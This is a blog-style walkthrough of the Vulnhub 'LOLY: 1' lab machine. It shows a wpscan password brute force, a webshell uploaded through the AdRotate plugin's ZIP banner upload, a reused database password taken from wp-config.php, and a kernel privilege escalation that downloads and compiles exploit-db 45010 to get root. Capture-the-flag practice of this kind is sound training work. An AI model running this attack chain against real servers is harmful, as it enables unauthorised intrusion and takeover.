Vulnhub - LOLY: 1 | An ordinary day

Introduction

Difficulty: Easy
Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox)
Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).

This is LOLY: 1 from Vulnhub.

Ports

We’ve got one port only - HTTP on Port 80.

Wordpress

Really the only thing on the webserver is a Wordpress installation, and we find it easily with gobuster. wpscan reveals only a single user (loly), and easily finds the password:

root@kali:/opt/vulnhub/loly# wpscan --url http://192.168.1.117/wordpress -U 'loly' -P /usr/share/seclists/Passwords/probable-v2-top12000.txt

// stuff removed for brevity

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando                                                                                                                                                         
Trying loly / barcelona Time: 00:00:04 <==                                                                                                     > (345 / 12990)  2.65%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: loly, Password: fernando

So I logged in, expecting to perhaps upload a plugin zip file, or edit a theme or something. But, no.

We have several plugins (AdRotate, Helly Dolly and Akismet) - only AdRotate is ‘unusual’. It’s version 5.8.6.2. Searchsploit reveals SQLi vulnerabilities in several older versions - all version 3.x.

We have several themes, including Feminine Style and Virtue, but these don’t seem to be vulnerable.

We can’t upload a new plugin (the button to do so is missing), and I’m … stuck.

After a while I consult a writeup to see what the move is. It turns out that the AdRotate plugin can be exploited by uploading a shell in a ZIP file format as a ‘banner image’. PHP files are blacklisted but ZIP is okay; the plugin automatically unzips the file and places it in the banners directory:

http://loly.lc/wordpress/wp-content/banners/rev-plugin.php

Navigating to this file triggers the shell.

I did the rest of the box by myself, but then I returned to this point. I tried googling for this exploit method, but the only references I found were in Loly writeups! And here’s what they had to say about it:

w found a vulnerable plugin( AdRotate ) we upload a shell by compressing our payload a zip file as a new banners file
i found a way to upload a shell & execute it
Make sure that first, we need to upload the reverse shell as zip format
For this, I saw that we have a plugin named “AdRotate” installed where we can upload a zip file

Huh? None of these say how they knew this plugin was vulnerable, or how to exploit it, or provide a link to a CVE, blog post or anything else. I understand my writeups aren’t always detailed; they aren’t meant to be. But I don’t quite understand how all of the ones I looked at just somehow magically knew that this method was available with AdRotate? Presumably there was an article about it somewhere; maybe my google-fu has failed me.

Loly

Anyway, I’m on as loly.

I run linpeas and find a password then su loly.

[+] Searching Wordpress wp-config.php files
wp-config.php files found:
/var/www/html/wordpress/wp-config.phpdefine( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'lolyisabeautifulgirl' );
define( 'DB_HOST', 'localhost' );


www-data@ubuntu:/dev/shm$ which python3
which python3
/usr/bin/python3
www-data@ubuntu:/dev/shm$ python3 -c 'import pty;pty.spawn("/bin/bash");'
python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@ubuntu:/dev/shm$ su loly
su loly
Password: lolyisabeautifulgirl

loly@ubuntu:/dev/shm$

Root

Linpeas also says we have an older kernel, which is true.

I obtain and run the Linux Exploit Suggester script:

loly@ubuntu:/dev/shm$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
<t-suggester/master/linux-exploit-suggester.sh -O les.sh                     
--2020-11-23 01:33:05--  https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.80.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.80.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 85113 (83K) [text/plain]
Saving to: ‘les.sh’

les.sh              100%[===================>]  83.12K  --.-KB/s    in 0.02s   

2020-11-23 01:33:05 (5.12 MB/s) - ‘les.sh’ saved [85113/85113]

loly@ubuntu:/dev/shm$ chmod +x les.sh
chmod +x les.sh
loly@ubuntu:/dev/shm$ ./les.sh
./les.sh

Available information:

Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

It suggests several as highly probable. I usually don’t have much luck with kernel exploits, but let’s go:

[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

SEND IT:

loly@ubuntu:/dev/shm$ wget https://www.exploit-db.com/download/45010
wget https://www.exploit-db.com/download/45010
--2020-11-23 01:36:25--  https://www.exploit-db.com/download/45010
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/txt]
Saving to: ‘45010’

45010                   [  <=>               ]  13.41K  45.2KB/s    in 0.3s    

2020-11-23 01:36:28 (45.2 KB/s) - ‘45010’ saved [13728]

loly@ubuntu:/dev/shm$ mv 45010 xx.c
mv 45010 xx.c
loly@ubuntu:/dev/shm$ gcc xx.c -o xx
gcc xx.c -o xx
loly@ubuntu:/dev/shm$ ./xx
./xx
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880035047000
[*] Leaking sock struct from ffff8800355a21c0
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff8800356718c0
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff8800356718c0
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(loly)
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
  ____               ____ ____  ____  
 / ___| _   _ _ __  / ___/ ___||  _ \ 
 \___ \| | | | '_ \| |   \___ \| |_) |
  ___) | |_| | | | | |___ ___) |  _ < 
 |____/ \__,_|_| |_|\____|____/|_| \_\
                                      
Congratulations. I'm BigCityBoy